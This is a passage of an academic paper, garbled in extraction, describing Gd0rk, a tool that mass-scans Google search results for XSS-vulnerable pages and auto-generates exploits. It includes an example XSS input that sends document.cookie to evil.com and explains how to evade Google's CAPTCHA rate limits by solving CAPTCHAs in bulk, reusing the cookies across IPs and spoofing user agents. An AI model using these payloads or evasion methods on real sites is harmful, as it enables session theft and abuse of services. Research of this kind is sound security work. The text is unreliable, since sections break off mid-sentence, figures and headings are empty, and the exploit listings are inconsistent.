Automatic XSS Detection Using Google
Riccardo Pelizzi
Tung Tran
Alireza Saberi
Abstract
XSS attacks continue to be prevalent today, not only because XSS sanitization is a hard problem in rich-formatting contexts, but also because there are so many potential avenues and so many uneducated developers who forget to sanitize reflected content altogether.
In this paper, we present Gd0rk, a tool which employs Google's advanced search capabilities to scan for websites vulnerable to XSS. It automatically generates and maintains a database of parameters to search, and uses heuristics to prioritize scanning hosts which are more likely to be vulnerable. Gd0rk includes a high-throughput XSS scanner which reverse engineers and approximates XSS filters using a limited number of web requests, and generates working exploits using HTML- and JavaScript-context-aware rules.
The output produced by the tool is not only a remarkably vast database of vulnerable websites along with working XSS exploits, but also a more compact representation of that list in the form of Google search terms, whose effectiveness has been tested during the search.
After running for a month, Gd0rk was able to identify more than 200,000 vulnerable pages. The results show that even without significant network capabilities, a large-scale scan for vulnerable websites can be conducted effectively.
Introduction

Static analysis tools to verify the correctness of sanitization functions with respect to the context where they appear do exist [2, 39], but they are not widely employed. Thus, many websites are still vulnerable to XSS attacks, and the exploits are for the most part trivial.

Google has already been employed as a tool to scan for web vulnerabilities [10] such as XSS [9, 7] and SQL injection [15, 8, 41]. Its advanced features allow users to search for specific strings in the text and in the URL of indexed pages. For example, text search can be used to look for specific error messages that reveal useful information about the web application, while URL search can be used to detect multiple deployments of specific web applications that are known to be vulnerable, or to search for web application scripts with a particular behaviour (such as redirection scripts and mailing scripts). Examples can be found in the Google Hacking Database [13]. However, the tools referenced above only search for and report vulnerabilities according to a fixed list of search terms. When these terms are effective in detecting vulnerable sites, they are called Google dorks.

Overview of Approach

Google limits the rate of searches from a single IP, and the limit is lower still for advanced searches containing the allinurl: modifier; after this limit has been exceeded, Google presents a CAPTCHA challenge to the user to increase the limit. Since CAPTCHAs can be solved from different IPs and used at a later time, Gd0rk includes a small tool to solve a large number of CAPTCHAs efficiently, allowing searches to run uninterrupted. Moreover, we use a very small number of different IPs and send a limited number of requests per minute. This does not reduce the scan speed significantly, as one web request to Google can queue up to 100 URLs for the XSS scanner.

The XSS scanner thread selects one of the search results generated by the Google thread according to a heuristic which prioritizes results containing parameters that have already appeared in vulnerable websites. The search result URL is used to generate multiple scan URLs, one for each URL parameter: the involved parameter value is modified to include a special scan string, whose purpose is to detect where the parameter is reflected in the HTML page and how the string is sanitized against XSS attacks (if it is sanitized at all). For example, given the parameter term and the Google result

http://vuln.com/search.php?term=hello&b=1

the scan URL becomes

http://vuln.com/search.php?term=hello#<a>a"a#&b=1
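The per-parameter scan-URL generation described above can be sketched as follows. This is our own simplified illustration, not Gd0rk's actual code; the function name and the exact joining logic are assumptions, while the scan string is taken from the example above.

```python
from urllib.parse import urlsplit, parse_qsl, urlunsplit

SCAN_STRING = '#<a>a"a#'  # the scan string from the example above

def scan_urls(result_url):
    """Yield one scan URL per query parameter, appending the scan
    string to that parameter's value while leaving the others intact."""
    parts = urlsplit(result_url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (name, value) in enumerate(params):
        probed = list(params)
        probed[i] = (name, value + SCAN_STRING)
        # Join without URL-encoding so the raw scan characters
        # actually reach the target application.
        query = "&".join(f"{n}={v}" for n, v in probed)
        yield urlunsplit((parts.scheme, parts.netloc, parts.path, query, ""))

for u in scan_urls("http://vuln.com/search.php?term=hello&b=1"):
    print(u)
# http://vuln.com/search.php?term=hello#<a>a"a#&b=1
# http://vuln.com/search.php?term=hello&b=1#<a>a"a#
```

Probing one parameter at a time keeps the other values intact, so the application is more likely to follow its ordinary code path.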
This allows Gd0rk to probe each parameter for XSS vulnerabilities using just one HTTP request, instead of trying one specific concrete attack at a time. This matters because the Google search thread can produce up to 100 results per request; Gd0rk's throughput therefore largely depends on the throughput of the XSS scanner. The server response to the scan URL is used to create a translation table, an approximation of the filter's sanitization behaviour: by looking at how the scan string is reflected in the document, it is possible to detect how individual characters are sanitized. A scan string might appear more than once in the document: each reflected instance of the parameter has its own translation table, as they might differ. Each reflected instance is then
passed to the XSS exploit generator: this module detects
the context of the reflection (the location of the reflected
scan string in the HTML parse tree) and attempts to build
a syntactically correct attack compatible with the sanitization employed by the web application. For example, given a parameter reflected inside a JavaScript double-quoted string:

<script>
var query = "param";
</script>

an input such as out"; attack();// breaks out of the string, yielding:

<script>
var query = "out"; attack();//";
</script>
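The translation-table idea can be sketched by embedding each probe character between unique markers and reading back what appears between those markers in the reflected document. This is our own minimal rendition, not Gd0rk's implementation; the marker format and probe set are assumptions.

```python
import re

# Characters whose sanitization behaviour we want to learn.
PROBE_CHARS = ['<', '>', '"', "'"]

def make_scan_string():
    # zqNz markers are chosen to be unlikely to be altered by filters.
    return "".join(f"zq{i}z{c}" for i, c in enumerate(PROBE_CHARS)) + f"zq{len(PROBE_CHARS)}z"

def translation_table(document):
    """Map each probe character to its reflected form, by reading
    what appears between consecutive markers in the response."""
    table = {}
    for i, c in enumerate(PROBE_CHARS):
        m = re.search(re.escape(f"zq{i}z") + "(.*?)" + re.escape(f"zq{i + 1}z"),
                      document, re.S)
        if m:
            table[c] = m.group(1)
    return table

# Simulate a server that HTML-encodes angle brackets but keeps quotes:
reflected = make_scan_string().replace("<", "&lt;").replace(">", "&gt;")
print(translation_table(reflected))
# {'<': '&lt;', '>': '&gt;', '"': '"', "'": "'"}
```

One response thus reveals, per reflected instance, how every interesting character is transformed.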
XSS Attacks

XSS attacks are web vulnerabilities that allow an attacker to inject malicious code into a web page served to a victim user. Although the attacker can already run his code in the user's browser by hosting it on his own malicious website and tricking the user into visiting it, that code runs in a sandbox: the same-origin policy (SOP) enforced by the browser prevents the attacker's code from stealing the user's credentials on any other web site, or from observing any (potentially sensitive) data exchanged between other websites and the user. However, XSS attacks allow the attacker to circumvent the SOP, because a vulnerable site embeds the attacker's code directly into one of its web pages, that is, within the domain boundaries enforced by the SOP.

Exploiting an XSS vulnerability involves three steps. First, the attacker uses some means to deliver his malicious payload to the vulnerable web site. Second, this payload is used by the web site during the course of generating a web page sent to the user's browser. If the web site is not XSS-vulnerable, it either discards the malicious payload, or at least ensures that it does not contribute to JavaScript code content in its output. However, if the site is vulnerable, then, in the third step, the user's browser ends up executing attacker-injected code in the page returned by the web site.

There are two approaches that an attacker can use to accomplish the first step. In a stored XSS attack, the injected code first gets stored on the web site in a file or database, and is subsequently used by the web site while constructing the victim page. For instance, consider a site that permits its subscribers to post comments. A vulnerability in this site may allow the attacker to post a comment that includes <script> tags. When this page is visited by the user, the attacker's comment, including her script, is included in the page returned to the user.

In a reflected XSS attack, the attacker lures the user into clicking a link or visiting a malicious web page, which causes a request from the user to be sent to the vulnerable website. This request includes one or more malicious parameters properly crafted by the attacker. When a vulnerable web site uses these parameters in the construction of a response's HTML parse tree (either because it echoes these parameters into the response page directly without proper sanitization, or because it serves JavaScript code that uses this data dynamically to build DOM nodes on the browser), the attacker's code is able to execute on this response page. When crafting the parameters, the attacker must take care of two elements:

1. The web application might filter or modify the provided input to prevent XSS attacks. This process is called sanitization. The attacker needs to work around the sanitization filter to output syntactically correct malicious code.

2. The syntax required to execute malicious code depends on the context where the parameter is echoed in the web page. For example, if the parameter is supposed to be visible text, then a suitable attack takes the form <script>xss();</script>, inserting a new script node. However, if the parameter is echoed inside a JavaScript string, the attack takes the form "; xss(); //, breaking out of the string and directly injecting malicious code into the existing script node.

For example, Figure 2 shows how a reflected attack can be carried out on a vulnerable website: maliciously crafted input can open a script node in the middle of the page and execute JavaScript code in the context of the web application. This code thus has access to the domain cookies, and may send them to an external location controlled by the attacker.
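The two concerns above can be illustrated with a small sketch: toy payload templates per reflection context (following the examples in the text), plus a crude feasibility check against a sanitization table. The function and table shape are our own illustration, not Gd0rk's code.

```python
# Toy payload templates for the two contexts described above.
PAYLOADS = {
    "text": "<script>xss();</script>",  # visible-text context: open a new script node
    "js_string": '"; xss(); //',        # JS string context: break out, inject, comment out the rest
}

def feasible(context, table):
    """Crude exploitability check: every character the payload needs
    must survive sanitization unchanged (table maps char -> reflection)."""
    return all(table.get(c, c) == c for c in set(PAYLOADS[context]))

# If the application HTML-encodes angle brackets, the text-context
# attack fails while the JS-string attack can still succeed:
table = {'<': '&lt;', '>': '&gt;', '"': '"'}
print(feasible("text", table))       # False
print(feasible("js_string", table))  # True
```

This is why the same page can be safe in one context and exploitable in another under the same filter.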
PHP Code
<html>
<head>
<title>Vulnerable Page</title>
</head>
<body>
<h1>Sorry, 0 search results returned for
<?php echo $_GET["term"]; ?></h1>
</body>
</html>
Malicious Input

http://a.com/search?term=<script>document.location=
"http://evil.com/" + document.cookie</script>

4.1
Unfortunately, Google does not allow users to easily retrieve a large number of search results programmatically. The JSON API, which is specifically offered for automated querying, is limited to 100 free queries per user per day. Moreover, it requires a valid key from Google. The alternative is to scrape the web interface. Unfortunately, this approach faces other challenges:
The most recent version of the Google Search interface is heavily dynamic and presents all its search results to the user through JavaScript DOM manipulation. To scrape the results from this page, it would be necessary to simulate a full-fledged JavaScript engine. Luckily, results in plain HTML are still served to older clients for compatibility reasons. Thus, we perform the query while spoofing the user agent and impersonating Internet Explorer 6.
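Scraping the legacy HTML interface can be sketched as below. This is a simplified illustration rather than Gd0rk's code: the query parameters, the regular expression, and the filtering heuristic are our assumptions, and Google's markup changes over time.

```python
import re
import urllib.request
from urllib.parse import quote

IE6_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

def google_query(terms, start=0):
    """Fetch one page of plain-HTML results while impersonating IE6."""
    url = f"http://www.google.com/search?q={quote(terms)}&num=100&start={start}"
    req = urllib.request.Request(url, headers={"User-Agent": IE6_UA})
    with urllib.request.urlopen(req) as resp:
        return resp.read().decode("utf-8", errors="replace")

def extract_results(html):
    """Heuristically pull external result URLs out of the static page."""
    return [u for u in re.findall(r'<a href="(http[^"]+)"', html)
            if "google." not in u]

# Parsing demonstrated on a canned snippet (no network access needed):
sample = ('<a href="http://vuln.com/search.php?term=x">result</a>'
          '<a href="http://www.google.com/preferences">prefs</a>')
print(extract_results(sample))  # ['http://vuln.com/search.php?term=x']
```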
Google limits the rate of searches that can be performed from a single IP; moreover, this limit is even lower for advanced searches, such as those containing the allinurl: modifier. After the threshold has been exceeded, Google presents a CAPTCHA challenge to the user. If the user solves the challenge successfully, Google returns a cookie that can be used to perform more queries, exceeding the threshold rate. We discovered that the cookie is not strictly associated with the IP that solved the challenge: the CAPTCHA can be solved from one IP and the cookie used at a later time from a different IP. For this reason, Gd0rk includes a small tool (shown in Figure 3) to quickly solve CAPTCHAs and avoid interruptions to the Google crawl. The number of CAPTCHAs required for the search to continue uninterrupted is modest: since a single request returns up to 100 results, the XSS scanner is more likely to be the bottleneck, and the Google search thread can proceed at a slower pace.
To increase the speed of the search, we use a limited number of IPs. We also experimented with proxies: since web proxies offer greater speed and availability than HTTP proxies or Tor [16], we wrote a Python module to send requests through web proxies running a popular web proxy software, Glype [12]. Unfortunately, it seems that these proxies are either handled differently by Google's throttling policy, or that they
Google Search

Originally based on the PageRank algorithm [26] and indexing billions of web pages, Google Search provides a large, public database of URLs. Normally, Google is used as a keyword-based search engine: users enter search terms and the most pertinent results are returned. However, Google also provides many advanced search options. For example, it allows users to restrict the search to the text content of HTML links, to the page title, or to a specific domain. One interesting option searches for content in the page URL. To activate this option, users must prepend their search terms with allinurl:. Searching for a specific URL format can be more helpful than a keyword-based search for certain purposes. For example, allinurl: forum aspx searches for forum applications written in ASP.NET. A keyword-based search could easily find forums, but would not be able to express the language constraint.
Google's advanced search features have been used effectively to find security issues. [13] shows many examples of search terms used to find informative error messages, password files, online devices and sensitive services. For example, the search string

"Error Diagnostic Information" intitle:"Error Occurred While"
XSS Scanner

Gd0rk includes an automatic black-box XSS vulnerability scanner, which is able to identify XSS vulnerabilities due to incorrect sanitization and to generate a working exploit using only a single HTTP request per parameter. This allows Gd0rk to scan a high number of websites in a small amount of time, which is critical for a large-scale tool.

The scanner's accuracy in detecting vulnerable pages and generating working exploits depends on its ability to:

1. reverse-engineer the sanitization functions employed by web applications and approximate them as character transformations;

2. detect all occurrences of the reflected parameter in the page and parse the page to understand their parse tree contexts.

To accomplish both goals, the scanner performs one HTTP request for each parameter in the query string, modifying these in turn by appending a scan string to their values.
Injecting the scan string into all parameters at once would require fewer requests and speed up the scan, but it would also decrease its accuracy, because changing all parameters at once is more likely to cause an error page to be returned instead of a page constructed with the ordinary application logic. Both types of page can contain vulnerabilities and should be tested. The format of the scan string is the following:
<html><body>
<script>
var query = "@";
</script>
</body></html>

<html><body>
<script>
function foo() {
var query = "@";
return query;
}
</script>
</body></html>
Scanning through the context hierarchy from the element to the root yields the string ";}. Then, the actual payload alert(1) is inserted. Finally, the context is scanned again in reverse to resync the script, yielding function foo() { var bar = ". This generates a syntactically correct exploit that executes as soon as the script tag is evaluated, without having to call the function foo. The following shows the exploit as prepared by the FSA (injected text in place of the parameter):
<html><body>
<script>
function foo() {
var query = "";} alert(1); function foo() {
var bar = "";
return query;
}
</script>
</body></html>
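The break-out/resync procedure can be sketched as a walk over the stack of open contexts: close each context from the innermost outwards, emit the payload, then reopen equivalent contexts in order. This is our simplified rendition of the idea; the context names and the closing/reopening strings are illustrative, not Gd0rk's internal representation.

```python
# Each open context knows how to close itself and how to reopen an
# equivalent context so the remainder of the page stays syntactically
# valid. Stack for the example above: function body > string (inside <script>).
CLOSERS   = {"js_string": '"', "js_function": ";}"}
REOPENERS = {"js_function": "function foo() { ", "js_string": 'var bar = "'}

def build_exploit(stack, payload):
    """stack lists the open contexts inside the script node, outermost
    first; close them innermost-first, inject, then reopen in order."""
    breakout = "".join(CLOSERS[c] for c in reversed(stack))
    resync = "".join(REOPENERS[c] for c in stack)
    return breakout + " " + payload + " " + resync

print(build_exploit(["js_function", "js_string"], "alert(1);"))
# ";} alert(1); function foo() { var bar = "
```

Applied to the example, this reproduces the break-out string ";}, the payload, and the resync text function foo() { var bar = ".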
[Figure: % Vulnerable vs. Rank]
Results
Conclusions
Related Work
Related work falls roughly into two categories: black-box web application vulnerability scanners and white-box source code analyzers.
[22] describes SecuBat, perhaps the tool most similar to Gd0rk: it is a vulnerability scanner that crawls the web for HTML forms, probing their target URLs for XSS vulnerabilities and SQL injections by appropriately filling form values and submitting the form. Instead of driving the crawl using Google results, SecuBat starts from a single URL provided by the user and follows the links contained in webpages. It can thus be used to scan a single web application for vulnerabilities. However,
References

[1] Acunetix. Acunetix Web Security Scanner. http://www.acunetix.com/company/index.htm.

[2] Balzarotti, D., Cova, M., Felmetsger, V., Jovanovic, N., Kirda, E., Kruegel, C., and Vigna, G. Saner: Composing static and dynamic analysis to validate sanitization in Web applications. In IEEE Security and Privacy Symposium (2008).
Context           Reflected   Vulnerable
JS Event          3.50%       3.90%
Text              18.51%      39.84%
Script tag        7.61%       14.47%
Attribute Name    0.02%       0.05%
Attribute Value   45.26%      54.08%
JavaScript URL    0.86%       2.03%
HTML Comment      2.53%       5.43%
Title             4.00%       11.73%
[5] Bau, J., Bursztein, E., Gupta, D., and Mitchell, J. State of the art: Automated black-box web application vulnerability testing. In 2010 IEEE Symposium on Security and Privacy (2010), IEEE, pp. 332–345.

[8] d3hydr8. D3hydr8 Google SQL scanner. http://r00tsecurity.org/db/code/txt.php?id=26, 2008.

[9] d3hydr8. D3hydr8 Google XSS scanner. http://darkcode.ath.cx/scanners/XSSscan.py, 2009.

[10] Dark Reading. Phishers Enlist Google Dorks. http://www.darkreading.com/security/application-security/211201291/index.html, 2008.

[23] Nadji, Y., Saxena, P., and Song, D. Document structure integrity: A robust basis for cross-site scripting defense. In Proceedings of the Network and Distributed System Security Symposium (2009).

[24] Nava, E. V., and Lindsay, D. Our favorite XSS filters/IDS and how to attack them. Black Hat USA 2009.

[25] Nava, E. V., and Lindsay, D. Universal XSS via IE8's XSS filters. Black Hat Europe 2010.

[26] Page, L., Brin, S., Motwani, R., and Winograd, T. The PageRank Citation Ranking: Bringing Order to the Web. http:

[30] WhiteHat Security. https://www.whitehatsec.com/services/services.html.

[37] Van Gundy, M., and Chen, H. Noncespaces: Using randomization to enforce information flow tracking and thwart cross-site scripting attacks. In 16th Annual Network & Distributed System Security Symposium, San Diego, CA, USA (2009).

[42] Xie, Y., and Aiken, A. Static detection of security vulnerabilities in scripting languages. In 15th USENIX Security Symposium (2006), pp. 179–192.

[43] Zalewski, M. skipfish. http://code.google.com/p/skipfish/.